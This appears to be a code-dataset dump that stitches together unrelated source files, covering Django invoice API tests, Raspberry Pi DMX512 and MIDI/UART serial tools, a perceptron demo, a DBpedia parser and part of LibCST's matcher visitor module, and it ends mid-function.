self.admin_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=self.admin_user)
self.debtors = debtor_factories.DebtorFactory.create_batch(
3, created_by=self.admin_user
)
self.invoices = InvoiceFactory.create_batch(
5, debtor=self.debtors[0]
)
self.url = reverse('v1:list-invoices')
def tearDown(self):
self.client.force_authenticate(user=None)
def test_list_invoices(self):
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(
len(self.invoices),
len(response.data)
)
# Check the content of the returned data
self.assertCountEqual(
['email', 'status', 'amount', 'due_date'],
response.data[0]
)
def test_cannot_list_invoices_without_auth(self):
# Test for user that didn't create invoices
other_user = couscous_factories.UserFactory()
self.client.force_authenticate(user=other_user)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(200, response.status_code)
self.assertFalse(response.data)
# Test for user without staff rights
self.admin_user.is_staff = False
self.admin_user.save()
self.client.force_authenticate(user=self.admin_user)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
# Test for logged out user
self.client.force_authenticate(user=None)
response = self.client.get(
self.url, format='json'
)
self.assertEqual(403, response.status_code)
def test_filter_results(self):
other_debtor_invoices = InvoiceFactory.create_batch(2, debtor=self.debtors[1])
# Filter by debtor email
url = f"{self.url}?debtor__email={self.debtors[1].email}"
response = self.client.get(
url, format='json'
)
self.assertEqual(
200, response.status_code
)
self.assertEqual(
len(other_debtor_invoices),
len(response.data)
)
# Filter by status
status = other_debtor_invoices[0].status
url = f"{self.url}?status={status}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(status, invoice['status'])
# Filter by amount
amount = float(other_debtor_invoices[1].amount)
url = f"{self.url}?amount={amount}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(amount, float(invoice['amount']))
# Filter by due date
due_date = self.invoices[2].due_date.strftime('%Y-%m-%d')
url = f"{self.url}?due_date={due_date}"
response = self.client.get(
url, format='json'
)
self.assertEqual(200, response.status_code)
for invoice in response.data:
self.assertEqual(due_date, invoice['due_date'])
def test_order_results(self):
other_debtor_invoices = InvoiceFactory.create_batch(2, debtor=self.debtors[1])
self.url = f"{self.url}?ordering="
# Order by descending debtor email
response = self.client.get(
f"{self.url}debtor__email", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['email'], response.data[0]['email']
)
# Order by ascending debtor email
response = self.client.get(
f"{self.url}-debtor__email", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['email'], response.data[0]['email']
)
# Order by descending status
response = self.client.get(
f"{self.url}status", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['status'], response.data[0]['status']
)
# Order by ascending status
response = self.client.get(
f"{self.url}-status", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['status'], response.data[0]['status']
)
# Order by descending amount
response = self.client.get(
f"{self.url}amount", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['amount'], response.data[0]['amount']
)
# Order by ascending amount
response = self.client.get(
f"{self.url}-amount", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['amount'], response.data[0]['amount']
)
# Order by descending due date
response = self.client.get(
f"{self.url}due_date", format='json'
)
self.assertEqual(200, response.status_code)
self.assertGreater(
response.data[-1]['due_date'], response.data[0]['due_date']
)
# Order by ascending due date
response = self.client.get(
f"{self.url}-due_date", format='json'
)
self.assertEqual(200, response.status_code)
self.assertLess(
response.data[-1]['due_date'], response.data[0]['due_date']
)
```
#### File: v1/invoice/views.py
```python
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, generics, permissions
import couscous.v1.invoice.models as invoice_models
import couscous.v1.invoice.serializers as invoice_serializers
class ListInvoiceView(generics.ListAPIView):
"""
List Invoices
"""
permission_classes = (permissions.IsAdminUser,)
serializer_class = invoice_serializers.InvoiceSerializer
queryset = invoice_models.Invoice.objects.all()
filter_backends = (DjangoFilterBackend, filters.OrderingFilter)
filter_fields = ('debtor__email', 'status', 'amount', 'due_date')
ordering_fields = ['debtor__email', 'status', 'amount', 'due_date']
def get_queryset(self):
return self.queryset.filter(debtor__created_by=self.request.user)
``` |
{
"source": "JimmyKenMerchant/Python_Codes",
"score": 3
} |
#### File: Python_Codes/dmx512/dmx512.py
```python
import RPi.GPIO as gpio
import threading
class DMX512:
"""Dependency:RPi.GPIO, threading"""
def __init__(self, list_gpio_output, num_gpio_busy_toggle, num_gpio_eop_toggle):
self.list_gpio_output = list_gpio_output
self.num_gpio_busy_toggle = num_gpio_busy_toggle
self.num_gpio_eop_toggle = num_gpio_eop_toggle
gpio.setmode(gpio.BCM)
gpio.setup(self.list_gpio_output, gpio.OUT)
gpio.output(self.list_gpio_output, 0)
gpio.setup(self.num_gpio_busy_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_busy_toggle, gpio.BOTH)
gpio.setup(self.num_gpio_eop_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_eop_toggle, gpio.BOTH)
def transmitter(self, list_data, index, length, time_delay):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
length += index;
while index < length:
data = list_data[index]
list_bit = []
if data & 0b00001:
list_bit.append(self.list_gpio_output[1])
if data & 0b00010:
list_bit.append(self.list_gpio_output[2])
if data & 0b00100:
list_bit.append(self.list_gpio_output[3])
if data & 0b01000:
list_bit.append(self.list_gpio_output[4])
if data & 0b10000:
list_bit.append(self.list_gpio_output[5])
#print(list_bit)
gpio.output(self.list_gpio_output, 0)
gpio.output(self.list_gpio_output[0], 1) # High State of Clock
gpio.output(list_bit, 1)
dup_time_delay = time_delay
while dup_time_delay > 0:
dup_time_delay -= 1
gpio.output(self.list_gpio_output[0], 0) # Falling Edge of Clock
while True:
if status_gpio_busy_toggle != gpio.input(self.num_gpio_busy_toggle):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
index += 1
break
def start_tx(self, list_data, index, length, time_delay):
thread = threading.Thread(name='dmx512_start_tx', target=self.transmitter, args=(list_data, index, length, time_delay, ))
thread.setDaemon(True)
thread.start()
return thread
def eop_toggle(self):
return gpio.input(self.num_gpio_eop_toggle)
def __del__(self):
gpio.cleanup()
if __name__ == '__main__':
import sys
import time
import signal
version_info = "DMX512 Alpha"
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
argv = sys.argv
if len(argv) == 1:
time_delay = 4
else:
time_delay = float(argv[1])
print(sys.version)
# Call Class
dmx512 = DMX512([12,16,19,20,21,26], 6, 13)
# Initialization of Flushing Method
list_data = [0x1F, 0x14, 0x1B, 0x11, 0x00, 0x13]
thread1 = dmx512.start_tx(list_data, 0, 6, time_delay)
thread1.join()
# Set Initial Values and Start
list_data = [1] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
# Start DMX512 Transmission
list_data = [0x1D, 0x1A]
thread1 = dmx512.start_tx(list_data, 0, 2, time_delay)
thread1.join()
status_gpio_eop_toggle = dmx512.eop_toggle()
count = 2
while True:
list_data = [count] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
count += 1
if count > 0xF:
count = 0;
break
while True:
if status_gpio_eop_toggle != dmx512.eop_toggle():
status_gpio_eop_toggle = dmx512.eop_toggle()
break
#if gpio.event_detected(num_gpio_eop_toggle) == 1:
# break
```
#### File: Python_Codes/midi/midi2serial.py
```python
import sys
import argparse
import serial
import jack
import binascii
import signal
import time
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--serial", nargs=1, metavar="STRING", required=True,
help="port of serial interface")
parser.add_argument("-b", "--baudrate", nargs=1, metavar="INT", required=True,
help="baud rate", type=int)
parser.add_argument("-t", "--timeout", nargs=1, metavar="FLOAT", required=True,
help="read time out", type=float)
parser.add_argument("-p", "--pppenable",
help="flag of enabling pseudo polyphonic channel", action="store_true")
parser.add_argument("-n", "--pppnumber", nargs=1, metavar="INT",
help="number of monophonic devices for psuedo polyphonic channel", type=int)
parser.add_argument("-c", "--pppchannel", nargs=1, metavar="INT",
help="psuedo polyphonic MIDI channel", type=int)
parser.add_argument("-i", "--pppinvisible",
help="visible only polyphonic MIDI channel, and invisible monophonic devices from output devices", action="store_true")
parser.add_argument("-v", "--pppvoices", nargs=1, metavar="INT", default=[1],
help="number of voices in each monophonic devices, e.g., if the device has two voices, '-v 2'", type=int)
args= parser.parse_args()
#print(args)
#argv = sys.argv
__name = "JACK Audio Connection Kit to Serial Interface Bridge"
__version = "1.0.1"
version_info = __name + " " + __version
prompt = "\n**Press Enter to Quit**"
print (sys.version)
# Set MIDI Channel for Psuedo Polyphonic Function (PPP Channel)
# Set Number of Monophonic Devices for Pseudo Polyphonic Function
if args.pppenable is True:
ppp_midichannel = args.pppchannel[0] - 1
ppp_voices = args.pppvoices[0]
ppp_numberdevices = args.pppnumber[0] * ppp_voices # If multi voices in each monophonic devices
ppp_voices = ppp_voices - 1 # Use with logical shift right
# Make Table to Check Active/Inactive Monophonic Devices and Current Tone Number
ppp_devices = []
for i in range(0, ppp_numberdevices, 1):
ppp_devices.append(0x80) # MIDI Tone Number Is Up to 127 (0x7F)
else:
ppp_midichannel = None # None Type
ppp_numberdevices = None # None Type
# Set UART Connection
try:
uart = serial.Serial(port = args.serial[0], baudrate = args.baudrate[0], timeout = args.timeout[0])
except serial.SerialException as e:
print(version_info + ": Error on UART Settings")
sys.exit(1)
# Set MIDI Connection and Callback
midiclient = jack.Client("MIDI-TO-SERIAL")
midiport = midiclient.midi_inports.register("input")
@midiclient.set_process_callback
def process(frames):
for offset, data in midiport.incoming_midi_events():
data = binascii.hexlify(data) # Buffer Object (Binary) to String of Ascii Characters
bytes = [] # Empty List
for i in range(0, len(data) >> 1, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
# data[start(inclusively):end(exclusively)], String to 8-bit Binary
start = i << 1 # 0,2,4,6... Multiplied By 2 through Logical Shift Left.
end = start + 2 # 2,4,6,8...
bytes.append(int(data[start:end], 16))
bytes = psuedo_polyphonic(bytes)
if bytes == None: # If bytes is None because of ---pppinvisible flag
continue
#print(offset, end="\n")
#print(data, end="\n")
#print(bytes, end="\n")
for byte_int in bytes:
byte = byte_int.to_bytes(1, "little")
uart.write(byte)
#print(byte)
# This Function Assumes That Only One MIDI Message Is Captured by Client
def psuedo_polyphonic(bytes):
for count, byte_int in enumerate(bytes):
if byte_int >= 0x80: # If Status Byte
if ppp_midichannel is not None:
midichannel = byte_int & 0xF # Only Bit[3:0], 0 to 15
if ppp_midichannel == midichannel: # If Channel Is Matched with Psuedo Polyphonic Channel
midistatus = byte_int >> 4 # Only Bit[7:4], 8 to 15
if midistatus <= 8: # If Note Off
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] == bytes[count + 1]:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
ppp_devices[i] = 0x80
break # Break For Loop, Not If Syntax
return bytes
elif midistatus <= 9: # If Note On
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] >= 0x80:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
ppp_devices[i] = bytes[count + 1]
break # Break For Loop, Not If Syntax
return bytes
elif midistatus <= 10: # If Polyphonic Key Pressure
for i in range(0, ppp_numberdevices, 1): # If 3 bytes, len(data) will be 6. Divided By 2 through Logical Shift Right.
if ppp_devices[i] == bytes[count + 1]:
bytes[count] = (byte_int & 0xF0) + ((ppp_midichannel + (i >> ppp_voices) + 1) & 0xF)
break # Break For Loop, Not If Syntax
return bytes
else: # If Other Messages, Pitch Bend, etc.
#bytes_tuple = tuple(bytes) # Make Constant List from Dynamic List
newbytes = [] # New List
for i in range(0, ppp_numberdevices >> ppp_voices, 1):
for byte2 in bytes:
if byte2 >= 0x80: # If Status Byte
newbytes.append((byte2 & 0xF0) + ((ppp_midichannel + i + 1) & 0xF))
else: # If Data Byte
newbytes.append(byte2)
time.sleep(0.0002) # Wait for Time
return newbytes
else: # If not PPP Channel
if args.pppinvisible == True: # If PPP Invisible
bytes = None
return bytes
# Set Keyboard Interrupt
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
uart.close()
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
# Activate MIDI Client by "with" Syntax
#midiclient.activate()
#midiclient.deactivate()
#midiclient.close()
with midiclient:
print(version_info + prompt)
input()
uart.close()
```
#### File: uart/jimmyconsole/uart.py
```python
import sys
import serial
import time
char_star = "\x2A".encode("ascii", "replace") # Asterisk
char_lf = "\x0A".encode("ascii", "replace") # Line Feed
char_cr = "\x0D".encode("ascii", "replace") # Carriage Return
char_nak = "\x15".encode("ascii", "replace") # NAK
char_esc = "\x1B".encode("ascii", "replace") # Escape
char_sepa = "|".encode("ascii", "replace") # Separator
esc_up = "\x1B[A".encode("ascii", "replace") # Cursor Up on Escape Sequence
esc_down = "\x1B[B".encode("ascii", "replace") # Cursor Down on Escape Sequence
esc_right = "\x1B[C".encode("ascii", "replace") # Cursor Right on Escape Sequence
esc_left = "\x1B[D".encode("ascii", "replace") # Cursor Left on Escape Sequence
class UartConsole:
"""Dependency:time"""
def __init__(self, uart, file):
self.__uart = uart
self.file = file
def send(self, text, enmirror, enwrite):
for integer in text: # Integer
char = integer.to_bytes(1, "little")
self.receive(enmirror, enwrite)
flag = True
while flag == True:
if char == char_lf:
char = char_cr
self.__uart.write(char)
char_res = self.__uart.read(1) # Bytes
if char_res == char: # Receive Succeed
flag = False
if enwrite == True: # Write to File
self.write(char_res)
if enmirror == True: # External Mirror
char_res = chr(int.from_bytes(char_res, "little"))
print(char_res, end="", flush=True)
elif char_res == char_nak: # Receive Negative Acknowledge
time.sleep(0.001)
else: # Receive Fails
flag = False
def receive(self, enmirror, enwrite):
char = self.__uart.read(1)
while len(char) != 0:
if enwrite == True:
self.write(char)
if enmirror == True:
char = chr(int.from_bytes(char, "little"))
print(char, end="", flush=True)
char = self.__uart.read(1)
def receive_bytes(self, enmirror, enwrite):
char = self.__uart.read(1)
while len(char) != 0:
if enwrite == True:
self.write(char)
if enmirror == True:
print(char.hex(), flush=True)
char = self.__uart.read(1)
def write(self,char):
if self.file is not None:
if char == char_cr:
return
char = chr(int.from_bytes(char, "little"))
self.file.write(char)
def input(self):
while True:
self.receive(True, True)
try:
text_input = input()
except KeyboardInterrupt:
break
print("\x1B[A", end="", flush=True) # Cursor Up
text_input += "\r"
text_input = text_input.encode("ascii", "replace")
self.send(text_input, True, False)
def input_hex(self): # Write Typed Hexadecimal Value to UART
while True:
self.receive(True, True)
try:
text_input = input().split() # Make List Split By Space
except KeyboardInterrupt:
break
#print(text_input, flush=True)
for text in text_input: # Integer
#print(text, end="\n", flush=True)
integer = int(text, 16) # String to Integer with Hexadecimal
byte = integer.to_bytes(1, "little") # Integer Type to Binary
self.__uart.write(byte)
print(byte, end="\n", flush=True)
def __del__(self):
self.__uart.close()
if __name__ == '__main__':
print (sys.version)
argv = sys.argv
print (argv[0]) # File Name
fsrc = open( argv[1], "rb") # Read Only With Raw Data (Integer)
text_all = fsrc.read()
if len(argv) == 6: # If Sixth Argument Exists (File to Write)
fdst = open( argv[5], "w+") # Write Only With UTF-8
else:
fdst = None;
uart = serial.Serial(port = argv[2], baudrate = int(argv[3]), timeout = float(argv[4]))
uartconsole = UartConsole(uart, fdst)
uartconsole.send(text_all, True, False)
uartconsole.receive(True, True)
uartconsole.input()
uartconsole.receive(True, True)
del uartconsole
``` |
{
"source": "jimmykodes/neuron_blog_post",
"score": 3
} |
#### File: jimmykodes/neuron_blog_post/app.py
```python
import json
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from perceptron import Neuron
def read_data():
with open('data.json') as f:
return json.load(f)
def main():
sns.set(rc={'figure.figsize': (8, 4)})
sns.set_style('darkgrid', {'figure.facecolor': '#dddddd', 'axes.facecolor': '#dddddd'})
n = Neuron(number_of_inputs=2, training_rate=.1)
data = read_data()
X = data['X']
y = data['y']
error = n.run(X, y)
df = pd.DataFrame(data=enumerate(error), columns=['iteration', 'error'])
plt.subplot(1, 2, 1)
sns.lineplot(x='iteration', y='error', data=df)
plot_data = []
for i, point in enumerate(X):
prediction = n.predict(point)
label = y[i]
if prediction == label:
plot_data.append([*point, label])
else:
plot_data.append([*point, 'error'])
df2 = pd.DataFrame(data=plot_data, columns=['x', 'y', 'label'])
plt.subplot(1, 2, 2)
sns.scatterplot(x='x', y='y', data=df2, hue='label', legend=False, palette={-1: 'blue', 1: 'green', 'error': 'red'})
plt.show()
if __name__ == '__main__':
main()
```
#### File: jimmykodes/neuron_blog_post/generate_data.py
```python
import json
import random
def generate_data(length):
data = {
'X': [],
'y': []
}
for _ in range(length):
x = random.randint(0, 500)
y = random.randint(0, 500)
label = -1 if x > y else 1
data['X'].append([x, y])
data['y'].append(label)
return data
def main():
data = generate_data(500)
with open('data.json', 'w+') as f:
f.write(json.dumps(data))
if __name__ == '__main__':
main()
``` |
{
"source": "jimmylai/knowledge",
"score": 3
} |
#### File: knowledge/dbpedia/get_abstract.py
```python
import re
import json
import bz2
import fileinput
__author__ = 'noahsark'
def get_abstract(string):
pat = re.compile('"(.*)"@en')
match = pat.match(string)
if match is not None:
return match.group(1)
items = json.load(open('entities.json'))
id_list = set(json.load(open('id_list.json')))
for line in fileinput.input():
pat = re.compile("<([^<>]*)> <([^<>]*)> (.*) .")
match = pat.match(line)
if match is not None:
if match.group(2) == 'http://www.w3.org/2000/01/rdf-schema#comment':
uri = match.group(1).decode('unicode_escape')
if uri not in id_list:
continue
if uri not in items:
items[uri] = {}
items[uri]['abstract'] = get_abstract(match.group(3)).decode('unicode_escape')
with open('entities.json', 'w') as fp:
fp.write(json.dumps(items, indent=4, ensure_ascii=False).encode('utf8'))
``` |
{
"source": "jimmylai/LibCST",
"score": 2
} |
#### File: libcst/matchers/_visitors.py
```python
from inspect import ismethod, signature
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Sequence,
Set,
Type,
TypeVar,
Union,
cast,
get_type_hints,
)
import libcst as cst
from libcst import CSTTransformer, CSTVisitor
from libcst.matchers._decorators import (
CONSTRUCTED_LEAVE_MATCHER_ATTR,
CONSTRUCTED_VISIT_MATCHER_ATTR,
VISIT_NEGATIVE_MATCHER_ATTR,
VISIT_POSITIVE_MATCHER_ATTR,
)
from libcst.matchers._matcher_base import (
AllOf,
AtLeastN,
AtMostN,
BaseMatcherNode,
MatchIfTrue,
OneOf,
matches,
)
_CSTNodeT = TypeVar("_CSTNodeT", bound=cst.CSTNode)
class MatchDecoratorMismatch(Exception):
# pyre-ignore We don't care about the type of func, just that its callable.
def __init__(self, func: Callable[..., Any], message: str) -> None:
super().__init__(
f"Invalid function signature for {func.__qualname__}: {message}"
)
def _get_possible_match_classes(matcher: BaseMatcherNode) -> List[Type[cst.CSTNode]]:
if isinstance(matcher, (OneOf, AllOf)):
return [getattr(cst, m.__class__.__name__) for m in matcher.options]
else:
return [getattr(cst, matcher.__class__.__name__)]
def _get_possible_annotated_classes(annotation: Type[object]) -> List[Type[object]]:
if getattr(annotation, "__origin__", None) is Union:
return getattr(annotation, "__args__", [])
else:
return [annotation]
def _get_valid_leave_annotations_for_classes(
classes: Sequence[Type[cst.CSTNode]]
) -> Set[Type[object]]:
retval: Set[Type[object]] = set()
for cls in classes:
# Look up the leave annotation for each class, combine them so we get a list of
# all possible valid return annotations. Its not really possible for us (or
# pyre) to fully enforce return types given the presence of OneOf/AllOf matchers, so
# we do the best we can by taking a union of all valid return annotations.
# TODO: We could possibly teach LibCST codegen to generate a mapping of class
# to valid leave annotations when it generates leave_<Node> methods, but for
# now this is functionally identical. That would get rid of the need to provide
# a namespace here, as well as a gross getattr on the CSTTransformer class.
meth = getattr(cst.CSTTransformer, f"leave_{cls.__name__}")
namespace: Dict[str, object] = {
**{x: getattr(cst, x) for x in dir(cst)},
"cst": cst,
"libcst": cst,
}
type_hints = get_type_hints(meth, namespace, namespace)
if "return" in type_hints:
retval.update(_get_possible_annotated_classes(type_hints["return"]))
return retval
def _verify_return_annotation(
possible_match_classes: Sequence[Type[cst.CSTNode]],
# pyre-ignore We only care that meth is callable.
meth: Callable[..., Any],
decorator_name: str,
*,
expected_none: bool,
) -> None:
type_hints = get_type_hints(meth)
if expected_none:
# Simply look for any annotation at all and if it exists, verify that
# it is "None".
if type_hints.get("return", type(None)) is not type(None): # noqa: E721
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} should only decorate functions that do "
+ "not return.",
)
else:
if "return" not in type_hints:
# Can't check this, type annotation not supplied.
return
possible_annotated_classes = _get_possible_annotated_classes(
type_hints["return"]
)
possible_returns = _get_valid_leave_annotations_for_classes(
possible_match_classes
)
# Look at the union of specified return annotation, make sure that
# they are all subclasses of the original leave_<Node> return
# annotations. This catches when somebody tries to return a new node
# that we know can't fit where the existing node was in the tree.
for ret in possible_annotated_classes:
for annotation in possible_returns:
if issubclass(ret, annotation):
# This annotation is a superclass of the possible match,
# so we know that the types are correct.
break
else:
# The current ret was not a subclass of any of the annotated
# return types.
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} decorated function cannot return "
+ f"the type {ret.__name__}.",
)
pass
def _verify_parameter_annotations(
possible_match_classes: Sequence[Type[cst.CSTNode]],
# pyre-ignore We only care that meth is callable.
meth: Callable[..., Any],
decorator_name: str,
*,
expected_param_count: int,
) -> None:
# First, verify that the number of parameters is sane.
meth_signature = signature(meth)
if len(meth_signature.parameters) != expected_param_count:
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} should decorate functions which take "
+ f"{expected_param_count} parameter"
+ ("s" if expected_param_count > 1 else ""),
)
# Finally, for each parameter, make sure that the annotation includes
# each of the classes that might appear given the match string. This
# can be done in the simple case by just specifying the correct cst node
# type. For complex matches that use OneOf/AllOf, this could be a base class
# that encompases all possible matches, or a union.
params = [v for k, v in get_type_hints(meth).items() if k != "return"]
for param in params:
# Go through each possible matcher, and make sure that the annotation
# for types is a superclass of each matcher.
possible_annotated_classes = _get_possible_annotated_classes(param)
for match in possible_match_classes:
for annotation in possible_annotated_classes:
if issubclass(match, annotation):
# This annotation is a superclass of the possible match,
# so we know that the types are correct.
break
else:
# The current match was not a subclass of any of the annotated
# types.
raise MatchDecoratorMismatch(
meth,
f"@{decorator_name} can be called with {match.__name__} "
+ f"but the decorated function parameter annotations do "
+ f"not include this type.",
)
def _check_types(
# pyre-ignore We don't care about the type of sequence, just that its callable.
decoratormap: Dict[BaseMatcherNode, Sequence[Callable[..., Any]]],
decorator_name: str,
*,
expected_param_count: int,
expected_none_return: bool,
) -> None:
for matcher, methods in decoratormap.items():
# Given the matcher class we have, get the list of possible cst nodes that
# could be passed to the functionis we wrap.
possible_match_classes = _get_possible_match_classes(matcher)
has_invalid_top_level = any(
isinstance(m, (AtLeastN, AtMostN, MatchIfTrue))
for m in possible_match_classes
)
# Now, loop through each function we wrap and verify that the type signature
# is valid.
for meth in methods:
# First thing first, make sure this isn't wrapping an inner class.
if not ismethod(meth):
raise MatchDecoratorMismatch(
meth,
"Matcher decorators should only be used on methods of "
+ "MatcherDecoratableTransformer or "
+ "MatcherDecoratableVisitor",
)
if has_invalid_top_level:
raise MatchDecoratorMismatch(
meth,
"The root matcher in a matcher decorator cannot be an "
+ "AtLeastN, AtMostN or MatchIfTrue matcher",
)
# Now, check that the return annotation is valid.
_verify_return_annotation(
possible_match_classes,
meth,
decorator_name,
expected_none=expected_none_return,
)
# Finally, check that the parameter annotations are valid.
_verify_parameter_annotations(
possible_match_classes,
meth,
decorator_name,
expected_param_count=expected_param_count,
)
def _gather_matchers(obj: object) -> Set[BaseMatcherNode]:
visit_matchers: Set[BaseMatcherNode] = set()
for func in dir(obj):
try:
for matcher in getattr(getattr(obj, func), VISIT_POSITIVE_MATCHER_ATTR, []):
visit_matchers.add(cast(BaseMatcherNode, matcher))
for matcher in getattr(getattr(obj, func), VISIT_NEGATIVE_MATCHER_ATTR, []):
visit_matchers.add(cast(BaseMatcherNode, matcher))
except Exception:
# This could be a caculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
pass
return visit_matchers
def _gather_constructed_visit_funcs(
obj: object
) -> Dict[BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]]:
constructed_visitors: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = {}
for funcname in dir(obj):
try:
func = cast(Callable[[cst.CSTNode], None], getattr(obj, funcname))
except Exception:
# This could be a caculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
continue
for matcher in getattr(func, CONSTRUCTED_VISIT_MATCHER_ATTR, []):
casted_matcher = cast(BaseMatcherNode, matcher)
constructed_visitors[casted_matcher] = (
*constructed_visitors.get(casted_matcher, ()),
func,
)
return constructed_visitors
# pyre-ignore: There is no reasonable way to type this, so ignore the Any type. This
# is because the leave_* methods have a different signature depending on whether they
# are in a MatcherDecoratableTransformer or a MatcherDecoratableVisitor.
def _gather_constructed_leave_funcs(
obj: object
) -> Dict[BaseMatcherNode, Sequence[Callable[..., Any]]]:
constructed_visitors: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = {}
for funcname in dir(obj):
try:
func = cast(Callable[[cst.CSTNode], None], getattr(obj, funcname))
except Exception:
# This could be a caculated property, and calling getattr() evaluates it.
# We have no control over the implementation detail, so if it raises, we
# should not crash.
continue
for matcher in getattr(func, CONSTRUCTED_LEAVE_MATCHER_ATTR, []):
casted_matcher = cast(BaseMatcherNode, matcher)
constructed_visitors[casted_matcher] = (
*constructed_visitors.get(casted_matcher, ()),
func,
)
return constructed_visitors
def _visit_matchers(
matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], node: cst.CSTNode
) -> Dict[BaseMatcherNode, Optional[cst.CSTNode]]:
new_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {}
for matcher, existing_node in matchers.items():
# We don't care about visiting matchers that are already true.
if existing_node is None and matches(node, matcher):
# This node matches! Remember which node it was so we can
# cancel it later.
new_matchers[matcher] = node
else:
new_matchers[matcher] = existing_node
return new_matchers
def _leave_matchers(
matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], node: cst.CSTNode
) -> Dict[BaseMatcherNode, Optional[cst.CSTNode]]:
new_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {}
for matcher, existing_node in matchers.items():
if node is existing_node:
# This node matches, so we are no longer inside it.
new_matchers[matcher] = None
else:
# We aren't leaving this node.
new_matchers[matcher] = existing_node
return new_matchers
def _all_positive_matchers_true(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
requested_matchers = getattr(obj, VISIT_POSITIVE_MATCHER_ATTR, [])
for matcher in requested_matchers:
if all_matchers[matcher] is None:
# The passed in object has been decorated with a matcher that isn't
# active.
return False
return True
def _all_negative_matchers_false(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
requested_matchers = getattr(obj, VISIT_NEGATIVE_MATCHER_ATTR, [])
for matcher in requested_matchers:
if all_matchers[matcher] is not None:
# The passed in object has been decorated with a matcher that is active.
return False
return True
def _should_allow_visit(
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]], obj: object
) -> bool:
return _all_positive_matchers_true(
all_matchers, obj
) and _all_negative_matchers_false(all_matchers, obj)
def _visit_constructed_funcs(
visit_funcs: Dict[BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]],
all_matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]],
node: cst.CSTNode,
) -> None:
for matcher, visit_funcs in visit_funcs.items():
if matches(node, matcher):
for visit_func in visit_funcs:
if _should_allow_visit(all_matchers, visit_func):
visit_func(node)
class MatcherDecoratableTransformer(CSTTransformer):
"""
This class provides all of the features of a :class:`libcst.CSTTransformer`, and
additionally supports various decorators to control when methods get called when
traversing a tree. Use this instead of a :class:`libcst.CSTTransformer` if you
wish to do more powerful decorator-based visiting.
"""
def __init__(self) -> None:
CSTTransformer.__init__(self)
# List of gating matchers that we need to track and evaluate. We use these
# in conjuction with the call_if_inside and call_if_not_inside decorators
# to determine whether or not to call a visit/leave function.
self._matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {
m: None for m in _gather_matchers(self)
}
# Mapping of matchers to functions. If in the course of visiting the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a visit_* method.
self._extra_visit_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_visit_funcs(self)
# Mapping of matchers to functions. If in the course of leaving the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a leave_* method.
self._extra_leave_funcs: Dict[
BaseMatcherNode,
Sequence[
Callable[
[cst.CSTNode, cst.CSTNode], Union[cst.CSTNode, cst.RemovalSentinel]
]
],
] = _gather_constructed_leave_funcs(self)
# Make sure visit/leave functions constructed with @visit and @leave decorators
# have correct type annotations.
_check_types(
self._extra_visit_funcs,
"visit",
expected_param_count=1,
expected_none_return=True,
)
_check_types(
self._extra_leave_funcs,
"leave",
expected_param_count=2,
expected_none_return=False,
)
def on_visit(self, node: cst.CSTNode) -> bool:
# First, evaluate any matchers that we have which we are not inside already.
